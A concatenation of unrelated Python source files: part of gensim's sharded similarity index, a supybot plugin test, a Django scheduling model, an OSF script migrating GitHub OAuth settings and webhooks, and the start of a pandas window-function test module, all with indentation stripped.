fits into core memory (see the `(Sparse)MatrixSimilarity` classes in this module).
The shards themselves are simply stored as files to disk and mmap'ed back as needed.
"""
def __init__(self, output_prefix, corpus, num_features, num_best=None, chunksize=256, shardsize=32768):
"""
Construct the index from `corpus`. The index can be later extended by calling
the `add_documents` method. **Note**: documents are split (internally, transparently)
into shards of `shardsize` documents each, converted to a matrix, for faster BLAS calls.
Each shard is stored to disk under `output_prefix.shard_number` (=you need write
access to that location). If you don't specify an output prefix, a random
filename in temp will be used.
`shardsize` should be chosen so that a `shardsize x chunksize` matrix of floats
fits comfortably into main memory.
`num_features` is the number of features in the `corpus` (e.g. size of the
dictionary, or the number of latent topics for latent semantic models).
If `num_best` is left unspecified, similarity queries will return a full
vector with one float for every document in the index:
>>> index = Similarity('/path/to/index', corpus, num_features=400) # if corpus has 7 documents...
>>> index[query] # ... then result will have 7 floats
[0.0, 0.0, 0.2, 0.13, 0.8, 0.0, 0.1]
If `num_best` is set, queries return only the `num_best` most similar documents,
always leaving out documents for which the similarity is 0.
If the input vector itself only has features with zero values (=the sparse
representation is empty), the returned list will always be empty.
>>> index.num_best = 3
>>> index[query] # return at most "num_best" of `(index_of_document, similarity)` tuples
[(4, 0.8), (2, 0.13), (3, 0.13)]
You can also override `num_best` dynamically, simply by setting e.g.
`self.num_best = 10` before doing a query.
"""
if output_prefix is None:
# undocumented feature: set output_prefix=None to create the server in temp
self.output_prefix = utils.randfname(prefix='simserver')
else:
self.output_prefix = output_prefix
logger.info("starting similarity index under %s", self.output_prefix)
self.num_features = num_features
self.num_best = num_best
self.normalize = True
self.chunksize = int(chunksize)
self.shardsize = shardsize
self.shards = []
self.fresh_docs, self.fresh_nnz = [], 0
if corpus is not None:
self.add_documents(corpus)
def __len__(self):
return len(self.fresh_docs) + sum([len(shard) for shard in self.shards])
def __str__(self):
return ("Similarity index with %i documents in %i shards (stored under %s)" %
(len(self), len(self.shards), self.output_prefix))
def add_documents(self, corpus):
"""
Extend the index with new documents.
Internally, documents are buffered and then spilled to disk when there's
`self.shardsize` of them (or when a query is issued).
"""
min_ratio = 1.0 # 0.5 to only reopen shards that are <50% complete
if self.shards and len(self.shards[-1]) < min_ratio * self.shardsize:
# The last shard was incomplete (<; load it back and add the documents there, don't start a new shard
self.reopen_shard()
for doc in corpus:
if isinstance(doc, numpy.ndarray):
doclen = len(doc)
elif scipy.sparse.issparse(doc):
doclen = doc.nnz
else:
doclen = len(doc)
if doclen < 0.3 * self.num_features:
doc = matutils.unitvec(matutils.corpus2csc([doc], self.num_features).T)
else:
doc = matutils.unitvec(matutils.sparse2full(doc, self.num_features))
self.fresh_docs.append(doc)
self.fresh_nnz += doclen
if len(self.fresh_docs) >= self.shardsize:
self.close_shard()
if len(self.fresh_docs) % 10000 == 0:
logger.info("PROGRESS: fresh_shard size=%i", len(self.fresh_docs))
def shardid2filename(self, shardid):
if self.output_prefix.endswith('.'):
return "%s%s" % (self.output_prefix, shardid)
else:
return "%s.%s" % (self.output_prefix, shardid)
def close_shard(self):
"""
Force the latest shard to close (be converted to a matrix and stored
to disk). Do nothing if no new documents added since last call.
**NOTE**: the shard is closed even if it is not full yet (its size is smaller
than `self.shardsize`). If documents are added later via `add_documents()`,
this incomplete shard will be loaded again and completed.
"""
if not self.fresh_docs:
return
shardid = len(self.shards)
# consider the shard sparse if its density is < 30%
issparse = 0.3 > 1.0 * self.fresh_nnz / (len(self.fresh_docs) * self.num_features)
if issparse:
index = SparseMatrixSimilarity(self.fresh_docs, num_terms=self.num_features,
num_docs=len(self.fresh_docs), num_nnz=self.fresh_nnz)
else:
index = MatrixSimilarity(self.fresh_docs, num_features=self.num_features)
logger.info("creating %s shard #%s", 'sparse' if issparse else 'dense', shardid)
shard = Shard(self.shardid2filename(shardid), index)
shard.num_best = self.num_best
shard.num_nnz = self.fresh_nnz
self.shards.append(shard)
self.fresh_docs, self.fresh_nnz = [], 0
def reopen_shard(self):
assert self.shards
if self.fresh_docs:
raise ValueError("cannot reopen a shard with fresh documents in index")
last_shard = self.shards[-1]
last_index = last_shard.get_index()
logger.info("reopening an incomplete shard of %i documents", len(last_shard))
self.fresh_docs = list(last_index.index)
self.fresh_nnz = last_shard.num_nnz
del self.shards[-1] # remove the shard from index, *but its file on disk is not deleted*
logger.debug("reopen complete")
def query_shards(self, query):
"""
Return the result of applying shard[query] for each shard in self.shards,
as a sequence.
If PARALLEL_SHARDS is set, the shards are queried in parallel, using
the multiprocessing module.
"""
args = zip([query] * len(self.shards), self.shards)
if PARALLEL_SHARDS and PARALLEL_SHARDS > 1:
logger.debug("spawning %i query processes", PARALLEL_SHARDS)
pool = multiprocessing.Pool(PARALLEL_SHARDS)
result = pool.imap(query_shard, args, chunksize=1 + len(args) / PARALLEL_SHARDS)
else:
# serial processing, one shard after another
pool = None
result = imap(query_shard, args)
return pool, result
def __getitem__(self, query):
"""Get similarities of document `query` to all documents in the corpus.
**or**
If `query` is a corpus (iterable of documents), return a matrix of similarities
of all query documents vs. all corpus document. This batch query is more
efficient than computing the similarities one document after another.
"""
self.close_shard() # no-op if no documents added to index since last query
# reset num_best and normalize parameters, in case they were changed dynamically
for shard in self.shards:
shard.num_best = self.num_best
shard.normalize = self.normalize
# there are 4 distinct code paths, depending on whether input `query` is
# a corpus (or numpy/scipy matrix) or a single document, and whether the
# similarity result should be a full array or only num_best most similar
# documents.
pool, shard_results = self.query_shards(query)
if self.num_best is None:
# user asked for all documents => just stack the sub-results into a single matrix
# (works for both corpus / single doc query)
result = numpy.hstack(shard_results)
else:
# the following uses a lot of lazy evaluation and (optionally) parallel
# processing, to improve query latency and minimize memory footprint.
offsets = numpy.cumsum([0] + [len(shard) for shard in self.shards])
convert = lambda doc, shard_no: [(doc_index + offsets[shard_no], sim)
for doc_index, sim in doc]
is_corpus, query = utils.is_corpus(query)
is_corpus = is_corpus or hasattr(query, 'ndim') and query.ndim > 1 and query.shape[0] > 1
if not is_corpus:
# user asked for num_best most similar and query is a single doc
results = (convert(result, shard_no) for shard_no, result in enumerate(shard_results))
result = heapq.nlargest(self.num_best, itertools.chain(*results), key=lambda item: item[1])
else:
# the trickiest combination: returning num_best results when query was a corpus
results = []
for shard_no, result in enumerate(shard_results):
shard_result = [convert(doc, shard_no) for doc in result]
results.append(shard_result)
result = []
for parts in izip(*results):
merged = heapq.nlargest(self.num_best, itertools.chain(*parts), key=lambda item: item[1])
result.append(merged)
if pool:
# gc doesn't seem to collect the Pools, eventually leading to
# "IOError 24: too many open files". so let's terminate it manually.
pool.terminate()
return result
def vector_by_id(self, docpos):
"""
Return indexed vector corresponding to the document at position `docpos`.
"""
self.close_shard() # no-op if no documents added to index since last query
pos = 0
for shard in self.shards:
pos += len(shard)
if docpos < pos:
break
if not self.shards or docpos < 0 or docpos >= pos:
raise ValueError("invalid document position: %s (must be 0 <= x < %s)" %
(docpos, len(self)))
result = shard.get_document_id(docpos - pos + len(shard))
return result
def similarity_by_id(self, docpos):
"""
Return similarity of the given document only. `docpos` is the position
of the query document within index.
"""
query = self.vector_by_id(docpos)
norm, self.normalize = self.normalize, False
result = self[query]
self.normalize = norm
return result
def __iter__(self):
"""
For each index document, compute cosine similarity against all other
documents in the index and yield the result.
"""
# turn off query normalization (vectors in the index are already normalized, save some CPU)
norm, self.normalize = self.normalize, False
for chunk in self.iter_chunks():
if chunk.shape[0] > 1:
for sim in self[chunk]:
yield sim
else:
yield self[chunk]
self.normalize = norm # restore normalization
def iter_chunks(self, chunksize=None):
"""
Iteratively yield the index as chunks of documents, each of size <= chunksize.
The chunk is returned in its raw form (matrix or sparse matrix slice).
The size of the chunk may be smaller than requested; it is up to the caller
to check the result for real length, using `chunk.shape[0]`.
"""
self.close_shard()
if chunksize is None:
# if not explicitly specified, use the chunksize from the constructor
chunksize = self.chunksize
for shard in self.shards:
query = shard.get_index().index
for chunk_start in xrange(0, query.shape[0], chunksize):
# scipy.sparse doesn't allow slicing beyond real size of the matrix
# (unlike numpy). so, clip the end of the chunk explicitly to make
# scipy.sparse happy
chunk_end = min(query.shape[0], chunk_start + chunksize)
chunk = query[chunk_start: chunk_end] # create a view
yield chunk
def check_moved(self):
"""
Update shard locations, in case the server directory has moved on filesystem.
"""
dirname = os.path.dirname(self.output_prefix)
for shard in self.shards:
shard.dirname = dirname
def save(self, fname=None, *args, **kwargs):
"""
Save the object via pickling (also see load) under filename specified in
the constructor.
Calls `close_shard` internally to spill any unfinished shards to disk first.
"""
self.close_shard()
if fname is None:
fname = self.output_prefix
super(Similarity, self).save(fname, *args, **kwargs)
def destroy(self):
"""
Delete all files under self.output_prefix. Object is not usable after calling
this method anymore. Use with care!
"""
import glob
for fname in glob.glob(self.output_prefix + '*'):
logger.info("deleting %s", fname)
os.remove(fname)
#endclass Similarity
class MatrixSimilarity(interfaces.SimilarityABC):
"""
Compute similarity against a corpus of documents by storing the index matrix
in memory. The similarity measure used is cosine between two vectors.
Use this if your input corpus contains dense vectors (such as documents in LSI
space) and fits into RAM.
The matrix is internally stored as a *dense* numpy array. Unless the entire matrix
fits into main memory, use `Similarity` instead.
See also `Similarity` and `SparseMatrixSimilarity` in this module.
"""
def __init__(self, corpus, num_best=None, dtype=numpy.float32, num_features=None, chunksize=256, corpus_len=None):
"""
`num_features` is the number of features in the corpus (will be determined
automatically by scanning the corpus if not specified). See `Similarity`
class for description of the other parameters.
"""
if num_features is None:
logger.warning("scanning corpus to determine the number of features (consider setting `num_features` explicitly)")
num_features = 1 + utils.get_max_id(corpus)
self.num_features = num_features
self.num_best = num_best
self.normalize = True
self.chunksize = chunksize
if corpus_len is None:
corpus_len = len(corpus)
if corpus is not None:
if self.num_features <= 0:
raise ValueError("cannot index a corpus with zero features (you must specify either `num_features` or a non-empty corpus in the constructor)")
logger.info("creating matrix with %i documents and %i features", corpus_len, num_features)
self.index = numpy.empty(shape=(corpus_len, num_features), dtype=dtype)
# iterate over corpus, populating the numpy index matrix with (normalized)
# document vectors
for docno, vector in enumerate(corpus):
if docno % 1000 == 0:
logger.debug("PROGRESS: at document #%i/%i", docno, corpus_len)
# individual documents in fact may be in numpy.scipy.sparse format as well.
# it's not documented because other it's not fully supported throughout.
# the user better know what he's doing (no normalization, must
# explicitly supply num_features etc).
if isinstance(vector, numpy.ndarray):
pass
elif scipy.sparse.issparse(vector):
vector = vector.toarray().flatten()
else:
vector = matutils.unitvec(matutils.sparse2full(vector, num_features))
self.index[docno] = vector
def __len__(self):
return self.index.shape[0]
def get_similarities(self, query):
"""
Return similarity of sparse vector `query` to all documents in the corpus,
as a numpy array.
If `query` is a collection of documents, return a 2D array of similarities
of each document in `query` to all documents in the corpus (=batch query,
faster than processing each document in turn).
**Do not use this function directly; use the self[query] syntax instead.**
"""
is_corpus, query = utils.is_corpus(query)
if is_corpus:
query = numpy.asarray(
[matutils.sparse2full(vec, self.num_features) for vec in query],
dtype=self.index.dtype)
else:
if scipy.sparse.issparse(query):
query = query.toarray() # convert sparse to dense
elif isinstance(query, numpy.ndarray):
pass
else:
# default case: query is a single vector in sparse gensim format
query = matutils.sparse2full(query, self.num_features)
query = numpy.asarray(query, dtype=self.index.dtype)
# do a little transposition dance to stop numpy from making a copy of
# self.index internally in numpy.dot (very slow).
result = numpy.dot(self.index, query.T).T # return #queries x #index
return result # XXX: removed casting the result from array to list; does anyone care?
def __str__(self):
return "%s<%i docs, %i features>" % (self.__class__.__name__, len(self), self.index.shape[1])
#endclass MatrixSimilarity
class SparseMatrixSimilarity(interfaces.SimilarityABC):
"""
Compute similarity against a corpus of documents by storing the sparse index
matrix in memory. The similarity measure used is cosine between two vectors.
Use this if your input corpus contains sparse vectors (such as documents in
bag-of-words format) and fits into RAM.
The matrix is internally stored as a `scipy.sparse.csr` matrix. Unless the entire
matrix fits into main memory, use `Similarity` instead.
See also `Similarity` and `MatrixSimilarity` in this module.
"""
def __init__(self, corpus, num_features=None, num_terms=None, num_docs=None, num_nnz=None,
num_best=None, chunksize=500, dtype=numpy.float32):
self.num_best = num_best
self.normalize = True
self.chunksize = chunksize
if corpus is not None:
logger.info("creating sparse index")
# iterate over input corpus, populating the sparse index matrix
try:
# use the more efficient corpus generation version, if the input
# `corpus` is MmCorpus-like (knows its shape and number of non-zeroes).
num_terms, num_docs, num_nnz = corpus.num_terms, corpus.num_docs, corpus.num_nnz
logger.debug("using efficient sparse index creation")
except AttributeError:
# no MmCorpus, use the slower version (or maybe user supplied the
# num_* params in constructor)
pass
if num_features is not None:
# num_terms is just an alias for num_features, for compatibility with MatrixSimilarity
num_terms = num_features
if num_terms is None:
raise ValueError("refusing to guess the number of sparse features: specify num_features explicitly")
corpus = (matutils.scipy2sparse(v) if scipy.sparse.issparse(v) else
(matutils.full2sparse(v) if isinstance(v, numpy.ndarray) else
matutils.unitvec(v)) for v in corpus)
self.index = matutils.corpus2csc(
corpus, num_terms=num_terms, num_docs=num_docs, num_nnz=num_nnz,
dtype=dtype, printprogress=10000).T
# convert to Compressed Sparse Row for efficient row slicing and multiplications
self.index = self.index.tocsr() # currently no-op, CSC.T is already CSR
logger.info("created %r", self.index)
def __len__(self):
return self.index.shape[0]
def get_similarities(self, query):
"""
Return similarity of sparse vector `query` to all documents in the corpus,
as a numpy array.
If `query` is a collection of documents, return a 2D array of similarities
of each document in `query` to all documents in the corpus (=batch query,
faster than processing each document in turn).
**Do not use this function directly; use the self[query] syntax instead.**
"""
is_corpus, query = utils.is_corpus(query)
if is_corpus:
query = matutils.corpus2csc(query, self.index.shape[1], dtype=self.index.dtype)
else:
if scipy.sparse.issparse(query):
query = query.T # convert documents=rows to documents=columns
elif isinstance(query, numpy.ndarray):
if query.ndim == 1:
query.shape = (1, len(query))
query = scipy.sparse.csr_matrix(query, dtype=self.index.dtype).T
else:
# default case: query is a single vector, in sparse gensim format
query = matutils.corpus2csc([query], self.index.shape[1], dtype=self.index.dtype)
# compute cosine similarity against every other document in the collection
result = self.index * query.tocsc() # N x T * T x C = N x C
if result.shape[1] == 1 and not is_corpus:
# for queries of one document, return a 1d array
result = result.toarray().flatten()
else:
# otherwise, return a 2d matrix (#queries x #index)
result = result.toarray().T
return result
#endclass SparseMatrixSimilarity
|
###
# Copyright (c) 2005, Daniel DiPaolo
# Copyright (c) 2010, James McCoy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
from supybot.test import *
class AnonymousTestCase(ChannelPluginTestCase):
plugins = ('Anonymous',)
def testSay(self):
self.assertError('anonymous say %s I love you!' % self.channel)
self.assertError('anonymous say %s I love you!' % self.nick)
origreg = conf.supybot.plugins.Anonymous.requireRegistration()
origpriv = conf.supybot.plugins.Anonymous.allowPrivateTarget()
try:
conf.supybot.plugins.Anonymous.requireRegistration.setValue(False)
m = self.assertNotError('anonymous say %s foo!' % self.channel)
self.failUnless(m.args[1] == 'foo!')
conf.supybot.plugins.Anonymous.allowPrivateTarget.setValue(True)
m = self.assertNotError('anonymous say %s foo!' % self.nick)
self.failUnless(m.args[1] == 'foo!')
finally:
conf.supybot.plugins.Anonymous.requireRegistration.setValue(origreg)
conf.supybot.plugins.Anonymous.allowPrivateTarget.setValue(origpriv)
def testAction(self):
m = self.assertError('anonymous do %s loves you!' % self.channel)
try:
orig = conf.supybot.plugins.Anonymous.requireRegistration()
conf.supybot.plugins.Anonymous.requireRegistration.setValue(False)
m = self.assertNotError('anonymous do %s loves you!'%self.channel)
self.assertEqual(m.args, ircmsgs.action(self.channel,
'loves you!').args)
finally:
conf.supybot.plugins.Anonymous.requireRegistration.setValue(orig)
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
# -*- coding: utf-8 -*-
from django.db import models
from calendario import Calendario
from coordinador import Coordinador
class Horario(models.Model):
hora_desde = models.TimeField('desde', null=False)
hora_hasta = models.TimeField('hasta', null=False)
dia_semana = models.IntegerField(default=0, null=False)
penalizado = models.IntegerField(default=0)
movible = models.BooleanField(default=True)
calendario = models.ForeignKey(Calendario)
coordinador = models.ForeignKey(Coordinador, null=True)
def __str__(self, ):
return str(self.coordinador.especialidad)
def __eq__(self, o):
return self.hora_desde == o.hora_desde and\
self.dia_semana == o.dia_semana
def __ne__(self, o):
return self.dia_semana != o.dia_semana and\
self.hora_desde != o.hora_desde
def __lt__(self, o):
if self.dia_semana == o.dia_semana:
return self.hora_desde < o.hora_desde
return self.dia_semana < o.dia_semana
def __le__(self, o):
if self.dia_semana == o.dia_semana:
return self.hora_desde <= o.hora_desde
return self.dia_semana <= o.dia_semana
def __gt__(self, o):
if self.dia_semana == o.dia_semana:
return self.hora_desde > o.hora_desde
return self.dia_semana > o.dia_semana
def __ge__(self, o):
if self.dia_semana == o.dia_semana:
return self.hora_desde >= o.hora_desde
return self.dia_semana >= o.dia_semana
|
import logging
import os
import sys
import urlparse
from modularodm import Q
from framework.mongo import database
from framework.transactions.context import TokuTransaction
from website import settings
from website.app import init_app
from website.models import User, Node
from website.oauth.models import ExternalAccount
from website.addons.github.api import GitHubClient
from website.addons.github import settings as github_settings
from website.addons.github.utils import make_hook_secret
from website.addons.github.exceptions import GitHubError, ApiError
from scripts import utils as script_utils
logger = logging.getLogger(__name__)
PROVIDER = 'github'
PROVIDER_NAME = 'GitHub'
HOOK_DOMAIN = github_settings.HOOK_DOMAIN or settings.DOMAIN
# set of {ExternalAccount._id: (user_settings, oauth_settings)} mappings
# with invalid credentials, for logging purposes
invalid_oauth_creds = {}
# set of (node_settings[_'id'], external_account._id) tuples without a
# hook_secret, whether they were repairable or not. for logging purposes
settings_need_repair = []
def verify_user_and_oauth_settings_documents(user_document, oauth_document):
try:
assert('_id' in user_document)
assert('oauth_settings' in user_document)
assert('deleted' in user_document)
assert('owner' in user_document)
assert('_id' in oauth_document)
assert('github_user_id' in oauth_document)
assert('github_user_name' in oauth_document)
assert('oauth_access_token' in oauth_document)
assert(user_document.get('owner', None))
assert(user_document['oauth_settings'] == oauth_document['github_user_id'])
except AssertionError:
return False
else:
return True
def verify_node_settings_document(document, account):
try:
assert('_id' in document)
assert('deleted' in document)
assert('repo' in document)
assert('user' in document)
assert('registration_data' in document)
assert('owner' in document)
assert(document.get('owner', None))
assert('user_settings' in document)
except AssertionError:
return False
try:
assert('hook_id' in document)
assert('hook_secret' in document)
except AssertionError:
settings_need_repair.append((document['_id'], account._id))
logger.info(
'Making GH API request attempting to repair node settings<_id: {}> with ExternalAccount<_id: {}>'.format(document['_id'], account._id)
)
add_hook_to_old_node_settings(document, account)
return True
def add_hook_to_old_node_settings(document, account):
connect = GitHubClient(external_account=account)
secret = make_hook_secret()
hook = None
try:
hook = connect.add_hook(
document['user'], document['repo'],
'web',
{
'url': urlparse.urljoin(
HOOK_DOMAIN,
os.path.join(
Node.load(document['owner']).api_url, 'github', 'hook/'
)
),
'content_type': github_settings.HOOK_CONTENT_TYPE,
'secret': secret,
},
events=github_settings.HOOK_EVENTS,
)
except ApiError:
pass
if hook:
database['addongithubnodesettings'].find_and_modify(
{'_id': document['_id']},
{
'$set': {
'hook_id': hook.id,
'hook_secret': secret
}
}
)
def migrate_to_external_account(user_settings_document, oauth_settings_document):
if not oauth_settings_document.get('oauth_access_token'):
return (None, None, None)
try:
user_info = GitHubClient(access_token=oauth_settings_document['oauth_access_token']).user()
except (GitHubError, ApiError):
user_id = oauth_settings_document['github_user_id']
profile_url = None
display_name = oauth_settings_document['github_user_name']
else:
user_id = user_info.id
profile_url = user_info.html_url
display_name = user_info.login
new = False
user = User.load(user_settings_document['owner'])
try:
external_account = ExternalAccount.find(Q('provider_id', 'eq', user_id))[0]
logger.info('Duplicate account use found: User {0} with github_user_id {1}'.format(user.username, user_id))
except IndexError:
new = True
external_account = ExternalAccount(
provider=PROVIDER,
provider_name=PROVIDER_NAME,
provider_id=user_id,
profile_url=profile_url,
oauth_key=oauth_settings_document['oauth_access_token'],
display_name=display_name,
)
external_account.save()
if not profile_url:
invalid_oauth_creds[external_account._id] = (user_settings_document['_id'], oauth_settings_document['_id'])
logger.info("Created ExternalAccount<_id:{0}> with invalid oauth credentials.".format(
external_account._id
))
user.external_accounts.append(external_account)
user.save()
return external_account, user, new
def make_new_user_settings(user):
# kill backrefs to old models
database['user'].find_and_modify(
{'_id': user._id},
{
'$unset': {
'__backrefs.addons.addongithubusersettings': ''
}
}
)
user.reload()
return user.get_or_add_addon('github', override=True)
def make_new_node_settings(node, node_settings_document, external_account=None, user_settings_instance=None):
# kill backrefs to old models
database['node'].find_and_modify(
{'_id': node._id},
{
'$unset': {
'__backrefs.addons.addongithubnodesettings': ''
}
}
)
node.reload()
node_settings_instance = node.get_or_add_addon('github', auth=None, override=True, log=False)
node_settings_instance.repo = node_settings_document['repo']
node_settings_instance.user = node_settings_document['user']
node_settings_instance.hook_id = node_settings_document.get('hook_id', None)
node_settings_instance.hook_secret = node_settings_document.get('hook_secret', None)
node_settings_instance.registration_data = node_settings_document['registration_data']
node_settings_instance.save()
if external_account and user_settings_instance:
node_settings_instance.set_auth(
external_account,
user_settings_instance.owner,
log=False
)
return node_settings_instance
def migrate(dry_run=True):
user_settings_list = list(database['addongithubusersettings'].find())
# get in-memory versions of collections and collection sizes
old_user_settings_collection = database['addongithubusersettings']
old_user_settings_count = old_user_settings_collection.count()
old_node_settings_collection = database['addongithubnodesettings']
old_node_settings_count = old_node_settings_collection.count()
old_oauth_settings_collection = database['addongithuboauthsettings']
old_oauth_settings_count = old_oauth_settings_collection.count()
# Lists of IDs for logging purposes
external_accounts_created = []
migrated_user_settings = []
migrated_node_settings = []
user_no_oauth_settings = []
deleted_user_settings = []
broken_user_or_oauth_settings = []
no_oauth_creds = []
inactive_user_or_no_owner = []
unverifiable_node_settings = []
deleted_node_settings = []
nodeless_node_settings = []
for user_settings_document in user_settings_list:
oauth_settings_document = None
try:
if user_settings_document.get('oauth_settings', None):
oauth_settings_document = old_oauth_settings_collection.find_one({'github_user_id': user_settings_document['oauth_settings']})
except KeyError:
pass
if not oauth_settings_document:
logger.info(
"Found addongithubusersettings document (id:{0}) with no associated oauth_settings. It will not be migrated.".format(user_settings_document['_id'])
)
user_no_oauth_settings.append(user_settings_document['_id'])
continue
if user_settings_document['deleted']:
logger.info(
"Found addongithubusersettings document (id:{0}) that is marked as deleted.".format(user_settings_document['_id'])
)
deleted_user_settings.append(user_settings_document['_id'])
continue
if not verify_user_and_oauth_settings_documents(user_settings_document, oauth_settings_document):
logger.info(
"Found broken addongithubusersettings document (id:{0}) that could not be fixed.".format(user_settings_document['_id'])
)
broken_user_or_oauth_settings.append((user_settings_document['_id'], oauth_settings_document['_id']))
continue
external_account, user, new = migrate_to_external_account(user_settings_document, oauth_settings_document)
if not external_account:
logger.info("AddonGitHubUserSettings<_id:{0}> has no oauth credentials and will not be migrated.".format(
user_settings_document['_id']
))
no_oauth_creds.append(user_settings_document['_id'])
continue
else:
if new:
external_accounts_created.append(external_account._id)
linked_node_settings_documents = old_node_settings_collection.find({
'user_settings': user_settings_document['_id']
})
if not user or not user.is_active:
if linked_node_settings_documents.count() and not user.is_merged:
logger.warn("AddonGitHubUserSettings<_id:{0}> has no owner, but is used by AddonGitHubNodeSettings: {1}.".format(
user_settings_document['_id'],
', '.join([each['_id'] for each in linked_node_settings_documents])
))
raise RuntimeError("This should never happen.")
else:
logger.info("AddonGitHubUserSettings<_id:{0}> either has no owner or the owner's account is not active, and will not be migrated.".format(
user_settings_document['_id']
))
inactive_user_or_no_owner.append(user_settings_document['_id'])
continue
else:
user_settings_instance = make_new_user_settings(user)
for node_settings_document in linked_node_settings_documents:
if not verify_node_settings_document(node_settings_document, external_account):
logger.info(
"Found addongithubnodesettings document (id:{0}) that could not be verified. It will not be migrated.".format(
node_settings_document['_id'],
)
)
unverifiable_node_settings.append((node_settings_document['_id'], external_account._id))
continue
if node_settings_document['deleted']:
logger.info(
"Found addongithubnodesettings document (id:{0}) that is marked as deleted.".format(
node_settings_document['_id'],
)
)
deleted_node_settings.append(node_settings_document['_id'])
continue
node = Node.load(node_settings_document['owner'])
if not node:
logger.info("AddonGitHubNodeSettings<_id:{0}> has no associated Node, and will not be migrated.".format(
node_settings_document['_id']
))
nodeless_node_settings.append(node_settings_document['_id'])
continue
else:
node_settings_document = database['addongithubnodesettings'].find_one({'_id': node_settings_document['_id']})
make_new_node_settings(
node,
node_settings_document,
external_account,
user_settings_instance
)
migrated_node_settings.append(node_settings_document['_id'])
migrated_user_settings.append(user_settings_document['_id'])
logger.info(
"Created {0} new external accounts from {1} old oauth settings documents:\n{2}".format(
len(external_accounts_created), old_oauth_settings_count, [e for e in external_accounts_created]
)
)
logger.info(
"Successfully migrated {0} user settings from {1} old user settings documents:\n{2}".format(
len(migrated_user_settings), old_user_settings_count, [e for e in migrated_user_settings]
)
)
logger.info(
"Successfully migrated {0} node settings from {1} old node settings documents:\n{2}".format(
len(migrated_node_settings), old_node_settings_count, [e for e in migrated_node_settings]
)
)
if user_no_oauth_settings:
logger.warn(
"Skipped {0} user settings due to a lack of associated oauth settings:\n{1}".format(
len(user_no_oauth_settings), [e for e in user_no_oauth_settings]
)
)
if deleted_user_settings:
logger.warn(
"Skipped {0} deleted user settings: {1}".format(
len(deleted_user_settings), [e for e in deleted_user_settings]
)
)
if broken_user_or_oauth_settings:
logger.warn(
"Skipped {0} (user, oauth) settings tuples because they could not be verified:\n{1}".format(
len(broken_user_or_oauth_settings), ['({}, {})'.format(e, f) for e, f in broken_user_or_oauth_settings]
)
)
if invalid_oauth_creds:
logger.warn(
"Created {0} invalid ExternalAccounts from (user, oauth) settings tuples due to invalid oauth credentials:\n{1}".format(
len(invalid_oauth_creds), ['{}: ({}, {})'.format(e, invalid_oauth_creds[e][0], invalid_oauth_creds[e][1]) for e in invalid_oauth_creds.keys()]
)
)
if inactive_user_or_no_owner:
logger.warn(
"Skipped {0} user settings due to an inactive or null owner:\n{1}".format(
len(inactive_user_or_no_owner), [e for e in inactive_user_or_no_owner]
)
)
if no_oauth_creds:
logger.warn(
"Skipped {0} user settings due a lack of oauth credentials:\n{1}".format(
len(no_oauth_creds), [e for e in no_oauth_creds]
)
)
if settings_need_repair:
logger.warn(
"Made GH API calls for {0} node settings documents with external accounts because they needed to be repaired:\n{1}".format(
len(settings_need_repair), ['({}, {})'.format(e, f) for e, f in settings_need_repair]
)
)
if unverifiable_node_settings:
logger.warn(
"Skipped {0} (node settings, external_account) tuples because they could not be verified or repaired:\n{1}".format(
len(unverifiable_node_settings), ['({}, {})'.format(e, f) for e, f in unverifiable_node_settings]
)
)
if deleted_node_settings:
logger.warn(
"Skipped {0} deleted node settings:\n{1}".format(
len(deleted_node_settings), [e for e in deleted_node_settings]
)
)
if nodeless_node_settings:
logger.warn(
"Skipped {0} node settings without an associated node:\n{1}".format(
len(nodeless_node_settings), [e for e in nodeless_node_settings]
)
)
if dry_run:
raise RuntimeError('Dry run, transaction rolled back.')
def main():
dry_run = False
remove_old = True
if '--dry' in sys.argv:
dry_run = True
if not dry_run:
script_utils.add_file_logger(logger, __file__)
init_app(set_backends=True, routes=False)
with TokuTransaction():
migrate(dry_run=dry_run)
if __name__ == "__main__":
main()
|
from itertools import product
import pytest
import warnings
from warnings import catch_warnings
from datetime import datetime, timedelta
from numpy.random import randn
import numpy as np
from pandas import _np_version_under1p12
import pandas as pd
from pandas import (Series, DataFrame, bdate_range,
isna, notna, concat, Timestamp, Index)
import pandas.core.window as rwindow
import pandas.tseries.offsets as offsets
from pandas.core.base import SpecificationError
from pandas.errors import UnsupportedFunctionCall
from pandas.core.sorting import safe_sort
import pandas.util.testing as tm
import pandas.util._test_decorators as td
from pandas.compat import range, zip
N, K = 100, 10
def assert_equal(left, right):
if isinstance(left, Series):
tm.assert_series_equal(left, right)
else:
tm.assert_frame_equal(left, right)
@pytest.fixture(params=[True, False])
def raw(request):
return request.param
@pytest.fixture(params=['triang', 'blackman', 'hamming', 'bartlett', 'bohman',
'blackmanharris', 'nuttall', 'barthann'])
def win_types(request):
return request.param
@pytest.fixture(params=['kaiser', 'gaussian', 'general_gaussian'])
def win_types_special(request):
return request.param
class Base(object):
_nan_locs = np.arange(20, 40)
_inf_locs = np.array([])
def _create_data(self):
arr = randn(N)
arr[self._nan_locs] = np.NaN
self.arr = arr
self.rng = bdate_range(datetime(2009, 1, 1), periods=N)
self.series = Series(arr.copy(), index=self.rng)
